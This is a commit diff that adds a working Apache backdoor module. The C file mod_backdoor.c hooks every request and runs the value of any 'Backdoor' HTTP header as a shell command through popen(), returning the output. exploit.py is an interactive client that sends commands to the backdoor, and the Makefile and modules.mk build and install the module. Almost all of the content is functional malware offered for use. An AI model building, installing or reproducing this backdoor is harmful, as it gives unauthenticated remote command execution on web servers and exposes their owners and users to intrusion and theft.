[+] Init commit

Author: WangYihang

Makefile

@@ -0,0 +1,45 @@
+##
+##  Makefile -- Build procedure for sample backdoor Apache module
+##  Autogenerated via ``apxs -n backdoor -g''.
+##
+
+builddir=.
+top_srcdir=/usr/share/apache2
+top_builddir=/usr/share/apache2
+include /usr/share/apache2/build/special.mk
+
+#   the used tools
+APACHECTL=apachectl
+
+#   additional defines, includes and libraries
+#DEFS=-Dmy_define=my_value
+#INCLUDES=-Imy/include/dir
+#LIBS=-Lmy/lib/dir -lmylib
+
+#   the default target
+all: local-shared-build
+
+#   install the shared object file into Apache 
+install: install-modules-yes
+
+#   cleanup
+clean:
+	-rm -f mod_backdoor.o mod_backdoor.lo mod_backdoor.slo mod_backdoor.la 
+
+#   simple test
+test: reload
+	lynx -mime_header http://localhost/backdoor
+
+#   install and activate shared object by reloading Apache to
+#   force a reload of the shared object file
+reload: install restart
+
+#   the general Apache start/restart/stop
+#   procedures
+start:
+	$(APACHECTL) start
+restart:
+	$(APACHECTL) restart
+stop:
+	$(APACHECTL) stop
+

exploit.py

@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import requests
+import sys
+
+def exploit(host, port, command):
+    headers = {
+        "Backdoor": command
+    }
+    url = "http://%s:%d/" % (host, port)
+    response = requests.get(url, headers=headers)
+    content = response.content
+    print content
+
+def main():
+    if len(sys.argv) != 3:
+        print "Usage : "
+        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])
+        exit(1)
+    host = sys.argv[1]
+    port = int(sys.argv[2])
+    while True:
+        command = raw_input("$ ")
+        if command == "exit":
+            break
+        exploit(host, port, command)
+
+
+if __name__ == "__main__":
+    main()
+

mod_backdoor.c

@@ -0,0 +1,106 @@
+/*
+**  mod_backdoor.c -- Apache sample backdoor module
+**  [Autogenerated via ``apxs -n backdoor -g'']
+**
+**  To play with this sample module first compile it into a
+**  DSO file and install it into Apache's modules directory
+**  by running:
+**
+**    $ apxs -c -i mod_backdoor.c
+**
+**  Then activate it in Apache's apache2.conf file for instance
+**  for the URL /backdoor in as follows:
+**
+**    #   apache2.conf
+**    LoadModule backdoor_module modules/mod_backdoor.so
+**    <Location /backdoor>
+**    SetHandler backdoor
+**    </Location>
+**
+**  Then after restarting Apache via
+**
+**    $ apachectl restart
+**
+**  you immediately can request the URL /backdoor and watch for the
+**  output of this module. This can be achieved for instance via:
+**
+**    $ lynx -mime_header http://localhost/backdoor
+**
+**  The output should be similar to the following one:
+**
+**    HTTP/1.1 200 OK
+**    Date: Tue, 31 Mar 1998 14:42:22 GMT
+**    Server: Apache/1.3.4 (Unix)
+**    Connection: close
+**    Content-Type: text/html
+**
+**    The sample page from mod_backdoor.c
+*/
+
+#include "httpd.h"
+#include "http_config.h"
+#include "http_protocol.h"
+#include "ap_config.h"
+#include <stdio.h>
+#include <stdlib.h>
+
+/* The sample content handler */
+static int backdoor_handler(request_rec *r)
+{
+    /*
+    if (strcmp(r->handler, "backdoor")) {
+        return DECLINED;
+    }
+    r->content_type = "text/html";
+
+    if (!r->header_only)
+        ap_rputs("The sample page from mod_backdoor.c\n", r);
+    */
+    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+    const apr_array_header_t    *fields;
+    int                         i;
+    apr_table_entry_t           *e = 0;
+    char FLAG = 0;
+    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+
+    fields = apr_table_elts(r->headers_in);
+    e = (apr_table_entry_t *) fields->elts;
+
+    for(i = 0; i < fields->nelts; i++) {
+        if(strcmp(e[i].key, "Backdoor") == 0){
+            FLAG = 1;
+            break;
+        }
+    }
+
+    if (FLAG){
+        char * command = e[i].val;
+        FILE* fp = popen(command,"r");
+        char buffer[0x100] = {0};
+        int counter = 1;
+        while(counter){
+            counter = fread(buffer, 1, sizeof(buffer), fp);
+            ap_rwrite(buffer, counter, r);
+        }
+        pclose(fp);
+        return DONE;
+    }
+    return DECLINED;
+}
+
+static void backdoor_register_hooks(apr_pool_t *p)
+{
+    ap_hook_handler(backdoor_handler, NULL, NULL, APR_HOOK_MIDDLE);
+}
+
+/* Dispatch list for API hooks */
+module AP_MODULE_DECLARE_DATA backdoor_module = {
+    STANDARD20_MODULE_STUFF,
+    NULL,                  /* create per-dir    config structures */
+    NULL,                  /* merge  per-dir    config structures */
+    NULL,                  /* create per-server config structures */
+    NULL,                  /* merge  per-server config structures */
+    NULL,                  /* table of config file commands       */
+    backdoor_register_hooks  /* register hooks                      */
+};
+

modules.mk

@@ -0,0 +1,4 @@
+mod_backdoor.la: mod_backdoor.slo
+	$(SH_LINK) -rpath $(libexecdir) -module -avoid-version  mod_backdoor.lo
+DISTCLEAN_TARGETS = modules.mk
+shared =  mod_backdoor.la